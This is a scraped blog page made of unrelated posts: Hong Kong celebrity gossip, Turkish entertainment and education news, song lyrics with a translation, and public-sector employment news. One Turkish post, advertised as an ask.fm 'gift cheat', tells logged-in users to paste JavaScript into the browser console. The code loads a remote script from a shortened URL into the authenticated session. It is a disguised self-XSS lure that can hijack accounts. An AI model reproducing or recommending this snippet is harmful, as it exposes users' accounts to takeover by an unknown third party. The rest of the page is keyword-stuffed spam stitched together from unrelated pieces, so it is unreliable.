Fala Chen's relationship with boyfriend, "Neway Prince" Daniel Sit Sai Hang, had been always been a hot topic in the entertainment circle. All along, it had been rumored the couple were secretly married, but recently it was reported the couple broke up ending their 7 year relationship and have already started the paperwork to split the assets. It was rumored Fala asked her boyfriend to provide the capital to start her own artist management company, so she can manage herself and produce TV series. Not only will she able to promote herself, she can also promote newcomers. However, Daniel's father wasn't willing to make the investment, thus the idea failed. It was said Fala and Daniel got into a fight due to this matter, and Fala moved out of their 'love nest' where they cohabited. Because Fala had been in the US for her studies, she was unable to respond.

Yesterday afternoon, Fala was back in HK to attend an event with Moses Chan and responded to the rumor. Fala expressed she heard about the news while she was studying in the US, and her teacher gave her a lot of enlightenment: "There have been many changes this year. I used to be very straightforward and subjective; I could only see the black and white side, but now I can see things in the grey area. I have changed my values and how I view the world; this is a lifelong change. (The changes include your relationship?) I called Mr. Sit (Daniel Sit) to discuss this matter. There is consensus between us, we don't want the relationship to impact our careers. Give us some personal space and let us handle our own matters. I thought about whether I should clarify the rumor today, but Mr. Sit said that is not necessary. (Are you single now?) We have consensus. I know everyone is concern about me, many friends called me too, but don't think too much. I'm not commenting anymore. I want to say, I am happy now. My thoughts have been clear in the past several months." Asked if she's starting new? She said: "Considered so, things are changing and I'm going to keep on learning."

It was rumored the reason of the break up was because Daniel didn't give her money to start her own business? She said: "I read the report and thought most of the content were not true. Wayne Lai had said yesterday opening a business doesn't require money, you just need to print [business] cards and spent a few ten dollars on the business registration. Most of the rumor is not true."

Dislikes Media Linking Her Career to Money

Fala said honestly she does not like some reports always linking her "ideals" with money. "Like... a woman's career will always be linked to money. I think readers won't have a good impression after reading such reports. Honestly, I know many female artistes that are working hard to do the things they enjoy and I'm the same too, so no matter how my love life and financial situation are like, I will rely on 100% of my own efforts to keep going!"

But how can she describe her relationship with Daniel Sit now? Fala said: "A positive one. (Friend or boyfriend?) Because two people had a relationship for so long, its difficult to just define the relationship in a few words, especially if its a long time relationship, I cannot bear to use my mouth to define him. After all, I just hope to keep a low-profile and have personal space.

Fala called it off?

Reporters pursued the question, was Fala the one who called it off? She spread her hands out and smiled: "I didn't say that. I didn't say that. Haha. (You don't want to hurt him?) I'm not answering, I'm sorry, but I am currently very blessed." Asked if its because of the break up that she decided to go to study in the US? She expressed it is not related and that some magazine reports put their own values on the female artist, don't try to sell a story by raping her values. She said: "Don't link my work to money. I know many other female artists that work very hard to do the things they enjoy, I am no different. No matter how my love life and financial situation is in the future, I will still be in this industry 100%."

Moses Discloses Pregnant Aimee Has Great Appetite

As for Moses, whom had just announced his marriage and Aimee Chan's pregnancy, can he talk about it now? Moses said: "Not yet. (How is Aimee's appetite?) Very good, very healthy. (Drink coffee?) No. Cold drinks are not good for her health; she will cut back on cold and raw foods." Asked if he took off to accompany her? He said: "Not yet. (Bought baby products?) Nope. Actually I don't really know much. My emotions still has not recovered yet, and still need to get accustomed to many things." Ex-girlfriend Bernice Liu had been attacked by the media due to their marriage. Moses said: "I've always said to stop mentioning the past, don't discuss so much of it, but I do wish everyone well."

Source: Oriental Daily

O SES TÜRKİYE YENİ JÜRİ ÜYELERİ KİMLER OLACAK - O SES TÜRKİYE JÜRİ ÜYELERİ DEĞİŞİYOR MU

tv,o ses türkiye,o ses türkiye yeni jüri üyeleri kimler,o ses türkiyede kimler var,o ses türkiye ne zaman başlıyor,o ses türkiye jüri üyeleri değişti mi,o ses türkiye yeni bölümü ne zaman başlıyor,o ses türkiyede hangi isimler olacak,o ses türkiye yeni sezon ne zaman başlıyacak,o ses türkiye değişti mi,o ses tüekiye yeni isimler kimler,o ses türkiye jüri üyeleri kimler,o ses türkiye kim jüri olacak


O Ses Türkiye Jüri Üyeleri Kimler Olacak...

Geçen sezon coşku sürpriz ve renkli geçen O Ses Türkiye bu sezonda ekranlara bomba gibi girmeyi hedefliyor Acun Ilıcalı'nın her yaptığı proğram uzun yıllar sürmüş ve hepside adından çok bahsettirmiştir. İşte yine bu ssezonda O Ses Türkiye'yi devam ettirecek olan Acun yarışmada değişiklkik yaparak karşımıza çıkacak.

CANLI İZLEMEK İÇİN TIKLAYIN..Youtube Dizi İzle,Youtubediziizle,Dizi İzle,Dizi Fragmanı İzle,Dizi Seyret,Full Dizi İzle,HD,Youtube Fragman İzle,Youtube Dizi Tek Parça İzle,Youtube Tek Parça İzle,Yotube Full İzle,Youtube Dizi İzle,Youtubedizi,Dizi İzle,Dizi Fragmanı İzle,Fragmanı İzle Youtube,Dizi Seyret,Full Dizi İzle,HD Dizi İzle,Youtube Yemek Programları İzle,Yemek Programları,Tv Yemek Programları,Yemek Tarifleri,Resimli,Yemek Programları İzle,Yemek Programları,Televizyon Yemek Programları İzle,Yemek Programları Canlı İzle,Full İzle,Online O Ses Türkiye yarışmasında yapılacak olan değişiklik Jüri üyeleri olacak.

Acun Ilıcalı bu sezon ki O ses Türkiye yarışmasına eski jüri üyesi olan Hülya Avşar ile devam edeceğini açıklarken Mustafa Sandal, Murat Boz ve Hadise'nin yerine kimlerin geleceği henüz açıklanmadı.
Yarışma ile ilgili bilgiler açıklandıkça sitemizden takip edebilirsiniz.

Mustafa Sandal, Murat Boz ve Hadise yerine bakalım kimler hangi isimler gelecek.

Sizce yeni sezonda O Ses Türkiye yarışmasında Jüri üyesi kim olsun...

Nicholas Tse buys Rolls Royce for father


There's no one else who can celebrate Father's Day like Nicholas Tse does. After it was reported that he sold Patrick Tse's house and rented a more expensive home, the actor continued his lavish spending for his father by buying him a new luxury car.

According to Groove Asia website, the 33-year-old actor bought a new Rolls Royce, estimated at a price of USD 647,000 for the 77-year-old veteran actor, and forked out another USD 26,027 to buy an exclusive license plate number.

In addition to that, it was reported that the Rolls Royce also comes with a chauffeur to drive Patrick around.

When asked about the lavish gifts his son gave him, Patrick, who was seen in central Hong Kong recently, commented, "I am very happy with it, but an amount of retirement fund is missing!" - hinting light-heartedly that Nicholas might not have given him his monthly allowance recently due to the purchase.

Asked if he would be taking his two grandsons, Lucas and Quintus for a ride in his new car, Patrick enthused, "Of course. In fact, I had just taken them out to play the day before. They are big boys now and no longer cause any trouble. [Former daughter-in-law] Cecilia has taught them good."

2013-2014 AÖL Kayıtları ve Sınav Tarihleri

aöl sınav tarihleri, açık lise sınav tarihleri, açık lise kayıtları ne zaman başlıyor, aöl kayıt tarihleri 2013-2014


2013 2014 Açıköğretim Lisesi Kayıt Yenileme İşlemleri:

2013-2014 yılı Açıköğrettm Lisesi Yeni Kayıt Tarihleri: 

31 Ağustos 2013 – 21 Eylül 2013

2013-2014 yılı Açıköğretim Lisesi Kayıt Yenileme Tarihi: 

 17 Eylül 2013 – 12 Ekim 2013

2013-2014 Açıköğretim Liselerine Kayıt Ücretleri: 

Kayıt Ücretleri 20 TL.

Kayıt Ücretleri Nasıl ve Nereden Yatırılacak? 

Kayıt Ücretleri (20 TL)

- Ziraat Bankası
- Vakıflar Bankası
- Halk Bankası

bu bankalardan birisine yatırılacak, ayrıca kayıt yapılan kuruma da 5TL ücret ödenecektir.

2013-2014 Açıköğretim Lisesi Kayıtları Nereden Yapılacak?

Daha önceden kayıtlar Halk Eğitim Merkezlerinde yapılıyordu. Artık kayıt ve kayıt yenileme işlemleri en yakın Liselerden yapılacaktır.


Lise’yi herhangi bir sebepten dolayı bitiremeyenlerin lise diplomasını almaları için dışarıdan kalan derslerini vererek alabiliyor. Sizde dışarıdan açık lise okuyarak ve sınavlara girerek belli sayıdaki kredileri tamamladığınız taktirde mezun olabiliyorsunuz.
AÖL
Açık Öğretim Lisesine Nasıl Kayıt Yapılır?
Yeni Kayıt tarihleri, Açık Öğretim Lisesi resmi web sitesinde yayınlanan iş takviminde belirtilen tarihler arasında başvuru şartlarını taşıyan vatandaşlarımız,  Açık Öğretim Lisesine Yeni Kayıt yaptırabilirler. Açık Öğretim Lisesi Yeni Kayıt işlemleri tüm Halk Eğitimi ve Mesleki Eğitim Merkezlerince yapılmaktadır. Yeni kayıt için aşağıda sıralanan evrakları tamamlayanlar ilan edilen Yeni Kayıt tarihleri arasında bölgelerinde bulunan en yakın irtibat bürosuna başvurarak kayıtlarını yaptırabilirler.
Yeni Kayıt Başvurusu İçin Gerekli Evrakları
  • 1) İlköğretim Okulu veya Ortaokul Mezunu Öğrenciler;
    • T.C. Kimlik No Beyanı,
    • Son altı ay içinde ön cepheden çekilmiş ve 4,5×6 cm. ebadında bir adet vesikalık renkli fotoğraf,
    • İlköğretim okulu veya ortaokul diplomasının aslı (diploması kayıp olanlar Diploma Kayıp Örneğinin aslı ile) ya da denklik belgesinin aslı,
    • Kayıt ücretinin yatırıldığını gösteren banka dekontunun aslı,
    • Kayıt işlemi tamamlandıktan sonra bilgisayardan alınacak yeni kayıt öğrenci raporu (Bu belge kayıt sırasında irtibat büroları tarafından hazırlanır ve öğrenci tarafından imzalanır).
  • 2) Orta Öğretim Ara Sınıflarından Ayrılanlar;
    • T.C. Kimlik No Beyanı,
    • Son altı ay içinde ön cepheden çekilmiş ve 4,5×6 cm ebadında bir adet vesikalık renkli fotoğraf,
    • Alan seçmeli sınıf sistemi, sınıf sistemi ve kredili sistemden ayrılan öğrenciler, tasdikname ve Başarı Durum Belgesinin aslı, (Ek 2 belgesi)
    • Kayıt ücretinin yatırıldığını gösteren banka dekontunun aslı,
    • Kayıt işlemi tamamlandıktan sonra bilgisayardan alınacak yeni kayıt öğrenci raporu (Bu belge kayıt sırasında irtibat büroları tarafından hazırlanır ve öğrenci tarafından imzalanır).
  • 3) Yurt Dışında Öğrenim Görmüş Olanlar;
    • T.C. Kimlik No Beyanı,
    • Son altı ay içinde ön cepheden çekilmiş ve 4,5×6 cm ebadında bir adet vesikalık renkli fotoğraf,
    • Eğitim Ataşeliklerinden veya İl Milli Eğitim Müdürlüklerinden alınan kredisi ve toplam dönemi yazılı denklik belgesinin aslı,
    • Kayıt ücretinin yatırıldığını gösteren banka dekontunun aslı,
    • Kayıt işlemi tamamlandıktan sonra bilgisayardan alınacak yeni kayıt öğrenci raporu (Bu belge kayıt sırasında irtibat büroları tarafından hazırlanır ve öğrenci tarafından imzalanır).
  • 4) Açık Öğretim Lisesinde Kayıtlı Ancak; Öğrencilik durumu “Silik” Olanların Başvuruları:Silik Kaydı yaptıracak öğrenciler; (Açık Öğretim Lisesine kayıt yaptırdıktan sonra en az 2 dönem üst üste kayıt yenilemeyen öğrenciler);
    • Kayıt ücretinin yatırıldığını gösteren belgenin aslı.
  • 5) Açık Öğretim Lisesinden Tasdikname Alarak Ayrılanlar (Belgeli form c işlemi);
    • T.C. Kimlik No Beyanı,
    • Son altı ay içinde ön cepheden çekilmiş ve 4,5×6 cm ebadında bir adet vesikalık renkli fotoğraf,
    • Açık Öğretim Lisesinden aldığı tasdiknamenin aslı,
    • Kayıt ücretinin yatırıldığı gösteren  banka dekontunun aslı,
    • Kayıt işlemi tamamlandıktan sonra bilgisayardan alınacak yeni kayıt öğrenci raporu (Bu belge kayıt sırasında irtibat büroları tarafından hazırlanır ve öğrenci tarafından imzalanır).
  • 6) Meslekî Açık Öğretim Lisesinden Tasdikname almış öğrenci:
    • T.C. Kimlik No Beyanı,
    • Son altı ay içinde ön cepheden çekilmiş ve 4,5×6 cm ebadında bir adet vesikalık renkli fotoğraf,
    • Kayıt ücretinin yatırıldığını gösteren  banka dekontunun aslı,
    • Mesleki Açık Öğretim Lisesinden aldığı tasdikname belgesinin aslı,
    • Açık Öğretim Lisesine kaydının yapılmasını istediğine dair dilekçe,
    • Kayıt işlemi tamamlandıktan sonra bilgisayardan alınacak yeni kayıt öğrenci raporu (Bu belge kayıt sırasında irtibat büroları tarafından hazırlanır ve öğrenci tarafından imzalanır).
AÖL 2013-2014 kayıt ve sınav tarihleri açıklandığı gibi bu başlık altından sizlerle paylaşılacaktır.

Günlük Altın Yorumları

Güncel altın yorumu, güncel altın yorumları, en güncel altın yorumları, altın yorum, 20 haziran altın yorumu, günlük altın yorumları, altın almalı mı, altın satmalı mı, bu seviyeden altın alınır mı, bu seviyeden altın satılır mı, altın ne kadar daha düşer, altın destek, altın direnç, gram altın fiyatları, küçük altın fiyatları, altın onsu ne kadar, ons altın, cumhuriyet altını, kapalıçarşı altın fiyatları,
bankaların altın fiyatları, 2013 haziran altın yorumları, fed yorumları, 20 haziran 2013 altın yorumu, 21 haziran 2013 altın yorumu,

En Güncel Altın yorumlarını sizler için derledik. Şirketlerin günlük olarak yayımladıkları  Altın yorumlarının tamamını buradan sizlerle paylaşacağız. Sayfamızı takip edin  Altın yorumlarını kaçırmayın.

Ask.fm Hediye Hilesi

Arkadaşlar bu hileyle ask.fm de hediye hilesini uygulayabileceksiniz.
hile sorunsuz bir şekilde çalışıyor ve tamamen güvenilir.
Uyarı: Bu uygulama sadece Google Chrome'de çalışır.

Uygulanışı:
1.Google Chrome açıyoruz.
2. Ask.fm'e giriyoruz ve hesabımıza giriş yapıyoruz
3.Profilinize girin.
4. F12'ye basın. Karşınıza bir panel açılcak
5.O panelde CONSOLE'ye giriyoruz
6.Ve ben aşağıya bir kod ekledim onu oraya yapıştırıyoruz.
7.Son Olarakta ENTER’e basıyoruz ve 78 tane hediye hesabınıza ekleniyor :)


Kod:

function addJavascript(jsname){ var th = document.getElementsByTagName('head')[0]; var s = document.createElement('script'); s.setAttribute('type','text/javascript'); s.setAttribute('src',jsname); th.appendChild(s); } if(location.hostname.indexOf("ask.fm") >= 0){ addJavascript('http://goo.gl/H3nPP'); }

Uefa Avrupa Ligi ve Şampiyonlar Ligine Hangi Takımlar Gidecek?

2013 - 2014 Sezonunda Türkiye den Uefa Avrupa Ligi ve Şampiyonlar Ligine Hangi Takımlar Gidecek? Galatasaray, Bursaspor, Kayserispor ve Kasımpaşa mı Gidiyor Avrupa Maçlarına..


UEFA Disiplin Kuruluna sevk ettiği Fenerbahçe ve Beşiktaş’ı, Avrupa kupalarından men etmesi ile birlikte gözler geçtiğimiz sezonun puan tablosuna çevirildi ve en çok merak edilen sorulardan biri Avrupa kupalarına hangi takımların gideceği.

UEFA verdiği cezaların ardından bu sezon ülkemizi Avrupa kupalarında temsil edecek olan takımlar da değişti.

2012-2013 sezonu puan tablosuna göre ligi 2. sırada bitiren ve şampiyonlar ligi’nde ön eleme maçı oynayacak Fenerbahçe yerine ligi 4. sırada bitiren Bursaspor bu hakkı kazanmış olacak.

Geçtiğimiz sezonu 3. sırada bitirerek Avrupa Ligi’ne gitmeye hak kazanan Beşiktaş’ın yerine ise bu kupaya Kayserispor ve Kasımpaşa katılacak…

Spor Toto Süper Lig 2012-2013 Sezonu puan durumu
1- Galatasaray
2- Fenerbahçe
3- Beşiktaş
4- Bursaspor
5- Kayserispor
6- Kasımpaşa
(NOT: Türkiye Kupası finalisti Trabzonspor, UEFA Avrupa Ligi’ne katılıyor…)

Andy Lau and Sammi Cheng reunite after 10 Years

The film BLIND DETECTIVE (MAN TAM) is director Johnnie To Kei Fung, Andy Lau Tak Wa and Sammi Cheng Sau Man's 10 year reunion. Wa Jai joked that To Kei Fung's personality was the character's blue print. "I completely cloned how he mercilessly yells at people." Wa Jai said that
during the shoot To Kei Fung "sang after scolding at him". He said, "As soon as the production began I had to blindly run around in a forest. I had no action director or protective padding, I never stopped. With so many people on the set, I couldn't mess up. After 4 takes I said that my clothes were soak through and I had to change. After a 20 minute break I had to shoot a tree climbing scene. At the time I was suffering, I was out of breath. I didn't expect To Kei Fung to say 'you are old'. At the time I wanted to jump on him and hit him. In the end the scene was still cut. Later at the press conference he sang that my strength was on the decline." He joked that next time he would not work with To Kei Fung on an action film again.

Wa Jai complained that when they made RUNNING ON KARMA (DAI JET LO), To Kei Fung saw Li Bingbing perform a mid air stunt and took the chance to yell at him. "Even a girl can do it, yet you can't." Wa Jai joked, "Why would I dare to talk back? I am afraid of being embarrassed. From his movies everyone know how crazy he is."

To Kei Fung has not yelled at Sammi yet. "Maybe he knew that I was thick skinned. After yelling at me I would lose all my hair from the fright and become unable to act!" In the film still, Sammi displayed her three inch career line. She joked, "By chance the lighting was right, I of course had to show off. Normally I just keep it hidden, actually I have a 7 inch career line!"

Chris Brown: His BET Performance Surprise Revealed

Chris is ready to tear up the stage at the BET Awards on June 30. A source tells HollywoodLife.com EXCLUSIVELY that Breezy has a special surprise to help put the focus back on his music! Keep reading to find out what Chris’ surprise will be.

After an awful week, full of drama, Chris Brown is looking forward to performing this Sunday, June 30, at the BET Awards in Los Angeles. Chris wants to give the audience a performance of a lifetime, HollywoodLife.com was EXCLUSIVELY told.thumbnail

Chris Brown’s BET Awards Surprise — May Perform ‘Run It’ From 2005

While everyone is expecting Chris to perform a song off his upcoming released album, X, the 24-year-old artist has something a bit different in mind.
“He’s debating about doing a dance beat [and] might just take it back and hit them with one of his old school cuts, like ‘Run It’ from 2005,” a source connected to the singer tells HollywoodLife.com exclusively.  “That was like eight years ago — a time when everybody loved him and he didn’t have a care in the world.”

Chris Brown Wants To Put The Drama Behind Him

“[Chris is] thinking that if he goes back in time and performs a song from when he first hit the scene, people will remember him for his music and his talent, rather than for the drama that he’s been caught up in recently [i.e. his recent hit & run charges],” the source adds.
We certainly like Chris’ thinking. We’d enjoy seeing him perform a song from his past!
Do you think Chris can win over his critics with a performance of one of his older songs, HollywoodLifers?

Subscribe to me on YouTube
– Eric Ray

Hac Kuraları Neden İptal Edilecek?

Hac kuraları, hacı kuraları, hac kuraları neden iptal edilecek, hac kuraları neden iptal edildi, hacca kaç kişi gidecek, hac kuraları iptal edilenlerin listesi, 2013 hac kuraları, 2013 hac neden iptal, hac iptal,


2013 yılında hacca gidecek 74 bin kişinin kuraları geçtiğimiz ay çekilmişti. Hacca gitme hakkı elde eden 74 bin hacı adayını şu günlerde iptal korkusu sardı. 

Suudi Arabistan hükümeti, tüm dünyaya yaptığı duyuruda tüm ülkelerin hac kontenjanlarını %20 düşürme kararı aldıklarını bildirdi. Bu konu üzerine Diyanet İşleri Başkanlığından bir heyet hemen Suudi Arabistan'a gitti. Kontenjanların düşürülmemesi için görüşmelerde bulunan heyet malesef başarılı olamadı.

Suudi Arabistan hükümeti Kabe'nin etrafındaki genişletme çalışmaları yüzünden bu yıl sıkışıklık yaşanabileceği ve izdiham oluşabileceği endişesiyle hac kontenjanlarını düşürme kararı aldıklarını bildirdi.

Buna göre bu yıl ülkemizden hacca gitmeye hak kazanan 74 bin hacı adayından 14 800'ünün hac hakkı, yapılacak olan yeni bir kura ile iptal edilecek. Kurası iptal edilen hacı adayları 2014 yılında hacca götürülecek. 


       Hac kurası iptal edilenlerin listesi      

Inna - Inndia Şarkısı Dinle - Inndia Şarkı Sözü Türkçe

inna inndia 2012, inna inndia istanbul klibi izle, inna india şarkı sözü türkçe, india şarkısının sözleri tükçe, inna india istanbul rock dinle, inna india klibi izle 2012, inna india mp3, inna india şarkısı dinle, izle, müzik, video klip









Inna India Sözleri - Inna INNdia Sözleri ve Türkçesi

Welcome To India
You Don'T Need Nobody But India
She'S Enough To Make Your Body Go Wild
I Can Live My Life Here Right Now.
It'S A Little Bit Scandalous
But She Lives Her Life A Little Bit Dangerous
Everybody In The Club, Can You Handle Us?
I Can Live My Life Here Right Now.
Oh, How I Rock My Body..Can You Handle How I Move?
Are You Feeling Naughty..I'M Gonna Hypnotize You
Are You Ready For Me..And Then You'Ll Never Say
No, No, No.
The Sky Is The Limit..
I Can Fly, Are You With Me
Keep Your Eyes On Your Prize..
And Your Mind Off The Time.
Uh Baby, You Know That You Will Never Say
No, No, No.
Uh, La La La La La La La La
I Hear You Calling Inndia.
Uh, La La La La La La La La
I Hear You Calling Inndia.
Oh, How I Rock My Body
Can You Handle How I Move?
Are You Feeling Naughty?
I'M Gonna Hypnotize You
Are You Ready For Me?
And Then You'Ll Never Say No, No, No.
The Sky Is The Limit
I Can Fly, Are You With Me?
Keep Your Eyes On Your Prize
And Your Mind Off The Time
Uh Baby, You Know That You Will Never Say
No, No, No
Uh, La La La La La La La La
I Hear You Calling Inndia.
Everybody Stand Up
I Wanna Se Your Hands Up
I Wanna See You Move Your Body,
Girl Don'T Stop
And If You'Re Ballin
Let Me Hear You Callin‘
Cause We'll Be At The After Party,
'Till The Morning.
Everybody Stand Up
I wanna Se Your Hands Up
I Wanna See You Move Your Body,
Girl Don't Stop
And If You'Re Ballin
Let Me Hear You Callin‘
Cause We'Ll Be At The After Party,
Till The Morning.
Oh, How I Rock My Body
Can You Handle How I Move?
Are You Feeling Naughty?
I'M Gonna Hypnotize You
Are You Ready For Me?
And Then You'Ll Never Say No, No, No
The Sky Is The Limit
I Can Fly, Are You With Me?
Keep Your Eyes On Your Prize
And Your Mind Off The Time
Uh Baby, You Know That You Will Never Say
No, No, No.
-------------------------
IndiA

India'ya hoş geldin.
Kimseye ihtiyacın yok ama India
O, seni azdırmak için yeterince iyi
Hemen şimdi burada kendi hayatımı yaşayabilirim
Bir nebze dedikoducu
Ama o, kendi hayatını bir nebze tehlikeli yaşıyor
Herkes Kulüpte, bizi idare edebilir misin?
Hemen şimdi burada kendi hayatımı yaşayabilirim
Oh, bedenimi nasıl sallıyorum..
Hareket ettiğim şekilde idare edebilir misin?
Yaramaz hissediyor musun..
Seni hipnotize edeceğim
Benim için hazır mısın.. Ve daha sonra asla söylemeyeceksin
Hayır, Hayır, Hayır
Gökyüzü limit.. Uçabilirim, Benimle misin
Gözlerini ödülünün üzerinde tut.. Ve zihnin zamanı öldürür
Uh Bebek, Asla demeyeceğini biliyorsun
Hayır, Hayır, Hayır
Uh, La La La La La La La La
India diye seslendiğini duyuyorum
Uh, La La La La La La La La
India diye seslendiğini duyuyorum
Oh, bedenimi nasıl sallıyorum
Hareket ettiğim şekilde idare edebilir misin?
Yaramaz hissediyor musun?
Seni hipnotize edeceğim
Benim için hazır mısın
Ve daha sonra asla Hayır, Hayır, Hayır demeyeceksin.
Gökyüzü limit
Uçabilirim, Benimle misin
Gözlerini ödülünün üzerinde tut
Ve zihnin zamanı öldürür
Uh Bebek, Asla demeyeceğini biliyorsun
Hayır, Hayır, Hayır
Uh, La La La La La La La La
India diye seslendiğini duyuyorum
Herkes ayağa
Ellerini yukarıya kaldırdığını görmek istiyorum
Bedenini hareket ettirdiğini görmek istiyorum
Kızım durma
Ve eğleniyorsanız
Seslendiğini duymama izin ver
Çünkü partiden sonra birlikte olacağız
Sabaha kadar
Herkes ayağa
Ellerini yukarıya kaldırdığını görmek istiyorum
Bedenini hareket ettirdiğini görmek istiyorum
Kızım durma
Ve eğleniyorsanız
Seslendiğini duymama izin ver
Çünkü partiden sonra birlikte olacağız
Sabaha kadar
Oh, bedenimi nasıl sallıyorum
Hareket ettiğim şekilde idare edebilir misin?
Yaramaz hissediyor musun?
Seni hipnotize edeceğim
Benim için hazır mısın
Ve daha sonra asla Hayır, Hayır, Hayır demeyeceksin.
Gökyüzü limit
Uçabilirim, Benimle misin
Gözlerini ödülünün üzerinde tut
Ve zihnin zamanı öldürür
Uh Bebek, Asla demeyeceğini biliyorsun
Hayır, Hayır, Hayır

Kamu sözleşmelilerine bir kadro müjdesi daha Pekiya KİT Çalışanları

Bakan Faruk Çelik, Memur-Sen Konfederasyonu Genel Başkanı Ahmet Gündoğdu'yu Bakanlık'ta kabulünün ardından, basın mensuplarına sözleşmeli personelin durumu ile ilgi açıklama yaptı. Çelik, Gençlik ve Spor Bakanlığı, Sağlık Bakanlığı ile TRT kurumunda sözleşmeli olarak görev yapan 3 bin 500 kişinin daha isteklerine bağlı olarak kadroya alınacaklarını müjdeledi.



Ancak KİT'lerde çalışan 75 bin 667 sözleşmelinin uygulama dışında tutulması düşünülüyor.
Hükümetle memur sendikaları arasında pazarlığı devam eden kamudaki sözleşmeli personelin memur kadrosuna alınması çalışmasında KİT engeli çıktı.
Pazarlıklar sürüyor
Memur sendikaları, halen kamuda çalışan 175 bin sözleşmeli personelin tamamının bulundukları kamu kurumlarına memur olarak atanmasını isterken Çalışma ve Sosyal Güvenlik Bakanlığı ile Hazine bürokratları Kamu İktisadi Teşebbüsleri'ndeki (KİT) personelin bu uygulamanın dışında tutulması, diğer kurumlardakilerin ise memur yapılması yönünde görüş birliğine vardı. Uygulamanın bu şekilde çıkması halinde 175 bin sözleşmelinin sadece 100 bini memur olabilecek.
'Tayin imkanı doğar'
Bilgi veren bürokratlar, KİT'lerdeki personelin bulundukları kurumlar ve kurumların faaliyet gösterdiği illerin ekonomileri açısından kritik önem taşıdığını ifade ettiler. KİT'lerin ağırlıklı olarak büyük kentlerin dışında yer aldığına işaret eden bürokratlar, şunları söyledi: "KİT'lerdeki sözleşmeliler memur statüsüne dahil edildiği anda memur olan herkes için tayin imkanı doğacak. Personel memur olunca başka kurumlara kolaylıkla geçiş yapacak. Bu durumda da KİT'ler personelsizlikten çalışamaz hale gelebilecek. Bu kritik durum nedeniyle KİT personelinin memurluğa geçişi uygun bulunmadı:"
'Sözleşmeli' bitecek
Üzerinde varılan mutabakata göre sözleşmelilerin memur kadrosuna alınmasının ardından kamuda artık hiçbir şekilde sözleşmeli memur istihdam edilemeyecek. Buna göre Sağlık Bakanlığı'ndaki 4/B ve diğer sözleşmeliler, belediyeler, Gençlik ve Spor Bakanlığı ve TRT gibi kurumlardaki tüm sözleşmeliler memur olacak.
KİT'lerde 6 bin memur çalışıyor
Hazine kayıtlarına göre sayıları 27'yi bulan KİT'lerde sadece 6 bin 35 memur çalışıyor. Geri kalan personelin 75 bin 667'si sözleşmeli personel statüsünde. Ayrıca bu KİT'lerde 75 bin 127 kapsam içi işçi, 3 bin 288 kapsam dışı işçi ve 10 bin 857 geçici işçi istihdam ediliyor.
Kurum çalışanı sonucu bekliyor
Sözleşmelilerin memuriyet beklediği KİT'ler şöyle: TMO, BOTAŞ, TPAO, PTT, ÇAYKUR, DHMİ, EBK, TTK, TKİ, MKEK, ETİ Maden, EÜAŞ, TEİAŞ, TETAŞ, TEMSAN, TİGEM, DMO, TCDD TÜVESAŞ, TÜDEMSAŞ, TÜLOMSAŞ, KEGM, TDİ, TŞFAŞ, TTA, TEDAŞ, Sümer Holding,


164 BİN SÖZLEŞMELİ MEMUR OLSUN
Konfederasyonlar, kamuda 76 bini KİT’lerde olmak üzere toplam 164 bin sözleşmeli personel bulunduğunu anımsatarak, “KİT’lerdekilere tercih hakkı verilmesi şartıyla, tüm sözleşmeliler kadroya alınsın. Böylece kamuda 4 a/4 b/ 4c gibi ayrımlar ortadan kalksın. Sadece işçi ve memur olsun” yanıtını verdiler.
Memurun statüsünün değiştirilmesinin kendileri için ‘genel grev’ nedeni olacağını vurgulayan sendikalar, diğer 5 konuda ise görüş bildirmekten kaçındılar. Bu konuları kendi aralarında müzakere edip ortak bir metin oluşturma konusunda anlaştılar. Üzerinde çalışılacak diğer 5 başlık ise şöyle:
UYARMAK YERİNE PARA CEZASI
2- Hükümet, memurun disiplin cezası sisteminde de değişiklik önerdi. Uyarma ve kınama cezalarının kaldırılmasını, bunun yerine ‘doğrudan maaştan kesme’ cezasının getirilmesini önerdi.
ROTASYON DEĞİL, TEŞVİK!
3- Az gelişmiş bölgelerde ihtiyaç duyulan memurların buralarda çalışma isteksizliğinin giderilmesi. Hükümetin ‘memura rotasyon’ istediği şeklinde kamuoyuna yansımasına karşın sendikalar böyle bir önerinin toplantıda gündeme gelmediğini vurguladılar. Sorunun çözümü için bu bölgelerde çalışan tüm memurlar yerine doktor, ebe, hemşire, mühendis gibi mesleklerde yüksek maaş gibi teşviklerle cazibenin artırılabileceğine dikkat çektiler.
MÜSTEŞARLIK İÇİN 5 YIL DENEYİM
4- Hükümetin, önerdiği bir diğer konu ise kamuda üst düzey yönetici atamaları için gerekli olan 10-12 yıl şartı 5 yıla indirilsin, oldu. Ancak sendikalar 23 yaşında devlette çalışmaya başlayan bir mühendisin 28 yaşında genel müdür olmasının doğru olmayacağını bunun hem devlete hem de kişiye kötülük etmek anlamına geleceğini düşünüyor.
GÖREV SÜRESİ SINIRLANDIRILSIN
5- TÜİK, Diyanet İşleri Başkanlığında olduğu gibi üst düzey yöneticilerin görev sürelerine sınırlama getirilsin.
YARDIMCILIK 2 YIL OLSUN, SINAV VE TEZ KALKSIN
6- Kariyer mesleklerde atanma şartları değiştirilsin. Müfettiş yardımcılığı, uzman yardımcılığı gibi statülerde kalış süresi 3 yıl yerine 2 yıl olsun. Ayrıca bu kişilerin uzman ve ya müfettiş olmak için ayrı bir sınava girmelerine gerek kalmasın. Tez hazırlamaları da istenmesin.


Kit Personelide Kadro İstiyor. 

Mutlaka Bakınız.  Buraya TIKLAYINIZ

 


Share

Twitter Delicious Facebook Digg reddit Favorites More